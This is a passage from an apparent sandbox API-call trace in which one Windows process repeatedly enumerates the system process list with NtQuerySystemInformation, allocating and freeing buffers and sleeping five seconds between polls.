SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0151.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0151.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0151.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0151.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.295] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0151.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0151.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0151.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0151.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0151.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0151.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.409] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0151.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0151.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0151.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0151.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0151.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0151.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.940] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0152.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0152.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0152.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0152.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0152.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0152.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.248] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0152.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0152.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0152.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0152.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0152.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0152.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.516] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0152.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0152.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0152.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0152.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0152.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0152.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.812] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0152.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0152.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0152.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0152.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0152.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0152.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0152.971] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0152.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0152.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0152.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0152.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0152.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0153.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.133] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0153.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0153.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0153.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0153.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0153.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0153.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.481] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0153.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0153.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0153.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0153.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0153.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0153.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.675] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0153.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0153.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0153.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0153.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0153.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0153.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0153.819] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0153.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0153.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0153.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0153.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0153.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0154.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.114] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0154.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0154.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0154.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0154.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0154.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0154.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.238] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0154.243] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0154.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0154.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0154.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0154.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0154.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.353] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0154.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0154.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0154.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0154.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0154.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0154.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.720] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0154.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0154.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0154.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0154.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0154.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0154.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0154.874] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0154.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0154.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0154.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0154.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0154.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0155.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.348] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0155.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0155.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0155.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0155.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0155.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0155.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.476] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0155.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0155.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0155.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0155.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0155.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0155.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.630] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0155.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0155.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0155.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0155.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0155.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0155.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0155.766] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0155.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0155.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0155.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0155.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0155.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0156.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.106] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0156.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0156.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0156.112] 